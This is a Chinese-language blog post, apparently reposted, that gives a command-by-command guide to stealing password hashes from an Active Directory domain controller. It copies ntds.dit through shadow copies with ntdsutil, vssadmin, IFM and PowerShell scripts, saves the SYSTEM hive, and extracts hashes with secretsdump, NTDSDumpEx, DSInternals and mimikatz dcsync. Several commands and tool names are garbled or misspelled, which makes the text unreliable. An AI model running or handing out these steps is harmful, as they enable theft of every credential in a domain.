域控密码抓取
域控密码抓取NTDS.DIT是DC的数据库,内容有域用户、域组、用户Hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步掩护密码hash值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
位置:C:\Windows\NTDS
https://img2023.cnblogs.com/blog/3587706/202504/3587706-20250410150928670-1134267209.png
使用卷影拷贝提取域控NTDS
从Windows XP SP2和Windows Server 2003 开始,微软就向Windows操作系统中引入了一项名叫卷影拷贝的服务(Volume Shadow Copy Service-VSS)。这种服务允许Windows系统以手动大概自动的方式对文件或磁盘卷宗的当前状态进行备份(快照)。要留意的是,在这个过程中,即使文件处于打开状态下,该服务仍然可以直接进行文件备份。
NTDS.dit文件是默认杯Windows系统锁定的,想要读取该文件就要使用卷影拷贝服务,得到NTDS.dit文件的副本。
使用ntdsutil工具
ntdsutil.exe是一个为活动目次提供管理机制的命令行工具,该工具默认安装在域控服务器上,可以在域控制器上直接操作。
https://img2023.cnblogs.com/blog/3587706/202504/3587706-20250410150929058-1754450765.png
第一步:创建一个NTDS快照
ntdsutil.exe snapshot "activate instance ntds" create q q可以看到快照的uid
https://img2023.cnblogs.com/blog/3587706/202504/3587706-20250410150929392-2023210188.png
第二步:加载快照到磁盘中
ntdsutil.exe snapshot "mount {uid}"q qhttps://img2023.cnblogs.com/blog/3587706/202504/3587706-20250410150929674-1472075904.png
第三步:复制快照中的ntds.dit文件
copy 快照地址\Windows\NTDS\ntds.dit 目标地址第四步:删除快照
ntdsutil.exe snapshot "umount {uid}" "delete {uid}" q q通过vssadmin工具
vssadmin是Windows Server 2008以及Windows 7系统以上提供的VSS管理工具,它可以用于创建或删除卷影副本,列出卷影副本信息,他需要两步就可以提取NTDS文件
1.第一步:创建一个C盘快照
vssadmin create shadow /for=c:第二步:将快照中的NTDS文件复制出来
copy 卷影副本卷名\windows\NTDS\ntds.dit 地址末了在进行删除
vssadmin delete shadows /for=c: /quietIFM方式进行拷贝
在使用ntdsutil创建媒体安装集(IFM)时,需要进行天生快照、加载、将ntds.dit和盘算机的SAM文件复制到目的文件夹中等操作
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q此时,ntds.dit将被保存在C:\test\ActiveDirectory下,SYSTEN和SECURITY;两个文件将被保存在C:\test\registry文件夹下
第二步就是复制文件
copy "c:\teet\Active Directory\ntds.dit" C:\Users\Administrator\Desktop\ntds.ditvssown提取ntds.dit
vssown是一个vbs脚本,可以创建和删除卷影副本
1.启动卷影复礼服务
cscript vssown.vbs /start2.创建一个C盘的卷影副本
cscript vssown.vbs \create c3.列出当前卷影副本
cscript vssown.vbs /list4、复制文件到指定目次
copy 卷影副本卷名\windows\NTDS\ntds.dit 地址末了删除副本
cscript vssown.vbs /delete {uid}Copy-VSS.ps1
可以使用PS脚本直接导出
Import-Module .\Copy-VSS.ps1
Copy-VSSInvoke-NinjaCopy
Invoke-NinjaCopy也是PS脚本,可以直接导出NTDS和system文件
Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\ntds.dit"(目标地址)
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"(目标地址)离线读取NTDS文件中的hash
离线读取主要就是两步,第一步就是将域控的ntds.dit下载到本地
第二步就是在本地进行使用
留意:由于system.hive 李存放着ntds.dit的密钥,所以需要转储system.hive,不然没发检察ntds.dit里的内容
命令如下
reg save hklm\system c:\windows\temp\system.hive接下来介绍几种读取里面内容的方式,大家选一个顺手的就行
1.secretsdump.exe 工具读取
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL2.NTDSDump.exe工具读取
NTDSDumpEx -d ntds.dit -s system -o 1.txt3.DS Internals工具读取
此工具是PS脚本,使用命令如下
1、安装DS Internals
Install-Moudle DS Internals -Force 安装方式
Import-Module .\DS Internals 导入方式
2.导出hash并保存在txt文件
$key = Get-Boot key -Boot key 'system路径'
Get-ADD Account -All -DB Path 'ntds路径' -Boot key $key|Out-file output_hash.txt在线读取NTDS文件中的hash
1.使用mimikatz
lsadump::dcsync /domain:abc.com /all /csv (读取所有)
lsadump::dcsync /domain:abc.com /user:administrator(读取单个用户)2.使用QuarksPWDump工具
条件:ntds这个文件必须先导出来
Quarks PW Dump.exe --dump-hash-domain--ntds-file ntds.dit3.使用secretsdump工具
retsdump.exe 域名/administrator:密码@IP -outputfile 1.txt4.使用Invoke-DC Sync工具
Import-Module .\Invoke-DCSync.ps1
Invole-DCSync
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]